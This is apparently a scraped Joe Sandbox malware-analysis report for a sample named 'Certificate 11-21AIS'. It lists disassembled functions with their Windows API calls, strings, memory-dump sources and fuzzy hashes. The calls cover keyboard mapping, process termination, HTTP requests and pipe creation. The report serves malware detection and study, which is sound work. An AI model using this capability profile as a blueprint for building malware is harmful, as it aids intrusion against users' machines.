                                                                                • Part of subcall function 008E7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0097AC68,00000FA0,?,?,008E7B51,008E5E77,00976C70,00000014), ref: 008E7E41
                                                                              • __mtterm.LIBCMT ref: 008E7B55
                                                                                • Part of subcall function 008E7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,008E7B5A,008E5E77,00976C70,00000014), ref: 008E7D3F
                                                                                • Part of subcall function 008E7BBD: _free.LIBCMT ref: 008E7D46
                                                                                • Part of subcall function 008E7BBD: DeleteCriticalSection.KERNEL32(0097AC68,?,?,008E7B5A,008E5E77,00976C70,00000014), ref: 008E7D68
                                                                              • __calloc_crt.LIBCMT ref: 008E7B7A
                                                                              • GetCurrentThreadId.KERNEL32 ref: 008E7BA3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                              • String ID:
                                                                              • API String ID: 2942034483-0
                                                                              • Opcode ID: 142d19ab9ab557b8fc1dfba3ee0f4bc1816da6faa402b355f285eeb6f5d9ff38
                                                                              • Instruction ID: 5731d511570b32bf359c3b4dcd26dfb86482d4bc2297d31caf835a2d13436f98
                                                                              • Opcode Fuzzy Hash: 142d19ab9ab557b8fc1dfba3ee0f4bc1816da6faa402b355f285eeb6f5d9ff38
                                                                              • Instruction Fuzzy Hash: 35F0903212D3D219EA28777E7C06A8B2685FF43730B2006A9F964C91D2FF2088425162
                                                                              Function 008C27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008C281D
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 008C2825
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008C2830
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008C283B
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 008C2843
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008C284B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: b8b2d6a5a2724b731b6250bb8d0345e59d025b4419e2b5187c24721aadd688c2
                                                                              • Instruction ID: 4fa80eac464a1789a59974943b0d7772092c6769268407018b6123062a80bca9
                                                                              • Opcode Fuzzy Hash: b8b2d6a5a2724b731b6250bb8d0345e59d025b4419e2b5187c24721aadd688c2
                                                                              • Instruction Fuzzy Hash: 5F0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                              Function 00909AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 1423608774-0
                                                                              • Opcode ID: fba7fb767740a9512c2c5693605ab182ffed6f7a3e220b3e1c6b17d45718712f
                                                                              • Instruction ID: cda8f4b1fbe308b5424bf85fb845c4b1a586948177bdb541d767554b312ae2f8
                                                                              • Opcode Fuzzy Hash: fba7fb767740a9512c2c5693605ab182ffed6f7a3e220b3e1c6b17d45718712f
                                                                              • Instruction Fuzzy Hash: 9601A43A317211AFDB292B58ED58EEB77A9FF89701B040529F503920E1DBB49800EB50
                                                                              Function 00907BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00907C07
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00907C1D
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00907C2C
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00907C3B
                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00907C45
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00907C4C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 367ef51cd90789a4af6ad733dd2fdde4bedc51ddee7ac32d69e9efd909d32c7e
                                                                              • Instruction ID: 758b2d0458ed5517d113112744b94c00e1a72eebc447c6229479c75bc8921b5e
                                                                              • Opcode Fuzzy Hash: 367ef51cd90789a4af6ad733dd2fdde4bedc51ddee7ac32d69e9efd909d32c7e
                                                                              • Instruction Fuzzy Hash: 4EF0177A256158BBE6215B929C0EEEF7B7CEBCBB15F000018FA0591091D7A06A41E6B5
                                                                              Function 00909A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00909A33
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 00909A44
                                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 00909A51
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 00909A5E
                                                                                • Part of subcall function 009093D1: CloseHandle.KERNEL32(?,?,00909A6B,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 009093DB
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00909A71
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 00909A78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: ec030cd0896244a0913d06207630e4f6d392e79a1d9d6e4186f52f6d5f2d9474
                                                                              • Instruction ID: 311bff7da8785d96b9a1d4728a874d32e9b438e82b446cc59cadfc96a2832c3e
                                                                              • Opcode Fuzzy Hash: ec030cd0896244a0913d06207630e4f6d392e79a1d9d6e4186f52f6d5f2d9474
                                                                              • Instruction Fuzzy Hash: 16F05E3E25A211AFD7152BA4EC89EAA7769FF86301B140425F503910A5DBB59801EB50
                                                                              Function 008C1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DF4EA: std::exception::exception.LIBCMT ref: 008DF51E
                                                                                • Part of subcall function 008DF4EA: __CxxThrowException@8.LIBCMT ref: 008DF533
                                                                              • __swprintf.LIBCMT ref: 008C1EA6
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008C1D49
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 2125237772-557222456
                                                                              • Opcode ID: b9a09678eaf3fef69ef6d669ba3962a86e4bc44c9545e4536ca3a674fac8be83
                                                                              • Instruction ID: f44573cf6da74e5ba5fdc289e845264fcd44e35959909f605976e16e151ecdef
                                                                              • Opcode Fuzzy Hash: b9a09678eaf3fef69ef6d669ba3962a86e4bc44c9545e4536ca3a674fac8be83
                                                                              • Instruction Fuzzy Hash: 05913CB15086419FCB24EF28C899E6AB7B8FF95700F04492DF985D72A2DB30ED44CB52
                                                                              Function 0091AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0091B006
                                                                              • CharUpperBuffW.USER32(?,?), ref: 0091B115
                                                                              • VariantClear.OLEAUT32(?), ref: 0091B298
                                                                                • Part of subcall function 00909DC5: VariantInit.OLEAUT32(00000000), ref: 00909E05
                                                                                • Part of subcall function 00909DC5: VariantCopy.OLEAUT32(?,?), ref: 00909E0E
                                                                                • Part of subcall function 00909DC5: VariantClear.OLEAUT32(?), ref: 00909E1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4237274167-1221869570
                                                                              • Opcode ID: 8edfe83724629c32d770cae4986085ba872cdbc3a9937c45acb14020b0a902c6
                                                                              • Instruction ID: 93a497a38f4d5503090252efcdc0b883900d6e6c1376e9609fa0c9a6b549fc2f
                                                                              • Opcode Fuzzy Hash: 8edfe83724629c32d770cae4986085ba872cdbc3a9937c45acb14020b0a902c6
                                                                              • Instruction Fuzzy Hash: AC9148746083059FCB10DF28C485A9AB7F5FF89704F04886DF89A9B3A2DB31E945CB52
                                                                              Function 00905347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DC6F4: _wcscpy.LIBCMT ref: 008DC717
                                                                              • _memset.LIBCMT ref: 00905438
                                                                              • GetMenuItemInfoW.USER32(?), ref: 00905467
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00905513
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0090553D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 4152858687-4108050209
                                                                              • Opcode ID: 7eb33c18a4bc58b4a8d68a0772e7aca78e541ab650fb19eaebb77f76c227eeec
                                                                              • Instruction ID: f2f9d863148972f4687cf8c53caad6e0cec9e0d449f69e9aaa9e2ea5839a4093
                                                                              • Opcode Fuzzy Hash: 7eb33c18a4bc58b4a8d68a0772e7aca78e541ab650fb19eaebb77f76c227eeec
                                                                              • Instruction Fuzzy Hash: 4251EE716187019FD7149B28CC45AABB7EDEF85314F050A2EF895D32E0DBA0CD448F52
                                                                              Function 00900213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0090027B
                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009002B1
                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009002C2
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00900344
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                              • String ID: DllGetClassObject
                                                                              • API String ID: 753597075-1075368562
                                                                              • Opcode ID: 58084427561ac1261798d46f4893e4977a5f6473c1b0a859d242ac6b3e27beb8
                                                                              • Instruction ID: cb6e03a78981ce4779ab05d108476475cdb7f57259a349fa90c1495f56293c90
                                                                              • Opcode Fuzzy Hash: 58084427561ac1261798d46f4893e4977a5f6473c1b0a859d242ac6b3e27beb8
                                                                              • Instruction Fuzzy Hash: 32418E71605204EFDB06CF54C884B9A7BB9EF89314F1480A9ED09DF286D7B5DE44CBA0
                                                                              Function 00905007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00905075
                                                                              • GetMenuItemInfoW.USER32 ref: 00905091
                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009050D7
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00981708,00000000), ref: 00905120
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: b50c523d182be6d763f9f27e59ab12d22f35d1d0070a9c0e8ebef4324deb9822
                                                                              • Instruction ID: 3054926edbbddb698c4fa7728bf8f78f272ee113f50848e45ff63f70a0faa879
                                                                              • Opcode Fuzzy Hash: b50c523d182be6d763f9f27e59ab12d22f35d1d0070a9c0e8ebef4324deb9822
                                                                              • Instruction Fuzzy Hash: DA41AC742097019FD7209F28D881B6BB7E8EF86324F054A1EF9A9972D1D770E900CF62
                                                                              Function 00920567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00920587
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower
                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                              • API String ID: 2358735015-567219261
                                                                              • Opcode ID: b69bfb16b7166c991cfdd4f4ff8438995d74f0e8ffac3451c814362ad008682d
                                                                              • Instruction ID: 13644f448ab70bdf0ceb3ba50dd81025d7db1256932796ea3ec678d6135e40e2
                                                                              • Opcode Fuzzy Hash: b69bfb16b7166c991cfdd4f4ff8438995d74f0e8ffac3451c814362ad008682d
                                                                              • Instruction Fuzzy Hash: 0931B43151021AAFCF10EF58DC41EEEB3B8FF95314B108629E42AA76D6DB71E915CB80
                                                                              Function 008FB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008FB88E
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008FB8A1
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 008FB8D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: db06fcecb8bb89c6d735653d81902fc9386feb45817a531930f9eb6f00668108
                                                                              • Instruction ID: 8fa3203c6d6d7e13aede46497e00a3d00f6c82fa25ada6c3f3d039f788e35f09
                                                                              • Opcode Fuzzy Hash: db06fcecb8bb89c6d735653d81902fc9386feb45817a531930f9eb6f00668108
                                                                              • Instruction Fuzzy Hash: A721E476A10108AFD7049BB8D886DBE7778FF86394B104129F615E61E1DB748D069760
                                                                              Function 009143E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00914401
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00914427
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00914457
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0091449E
                                                                                • Part of subcall function 00915052: GetLastError.KERNEL32(?,?,009143CC,00000000,00000000,00000001), ref: 00915067
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 1951874230-3916222277
                                                                              • Opcode ID: 4641549db5bca1740abb6fa16f3bec04cdf1b497cb1b96e4ff7db269ef4cc045
                                                                              • Instruction ID: d3094697353c4a34a6d66304fc174b7b7c59333c3c588c8f28dc7708052d19f9
                                                                              • Opcode Fuzzy Hash: 4641549db5bca1740abb6fa16f3bec04cdf1b497cb1b96e4ff7db269ef4cc045
                                                                              • Instruction Fuzzy Hash: 9021BEB660020CBEEB119F94CC84FFBB6ECEB8D748F10841AF109D2190EA749D859771
                                                                              Function 009290E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
                                                                                • Part of subcall function 008DD17C: GetStockObject.GDI32(00000011), ref: 008DD1CE
                                                                                • Part of subcall function 008DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0092915C
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00929163
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00929178
                                                                              • DestroyWindow.USER32(?), ref: 00929180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 4146253029-1011021900
                                                                              • Opcode ID: 4a610efff26804cef61a2c3f3cbdf258ead171ecc48789dce322099d08620f1d
                                                                              • Instruction ID: a5e45c356f7252a91ed65f2be246990f1aa331dff1ba45dcdcad9712eb01ce82
                                                                              • Opcode Fuzzy Hash: 4a610efff26804cef61a2c3f3cbdf258ead171ecc48789dce322099d08620f1d
                                                                              • Instruction Fuzzy Hash: DD21D17121821ABBEF104F65EC84FBB37ADFF9A368F100628F91492195C731CC61A7A0
                                                                              Function 00909568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00909588
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009095B9
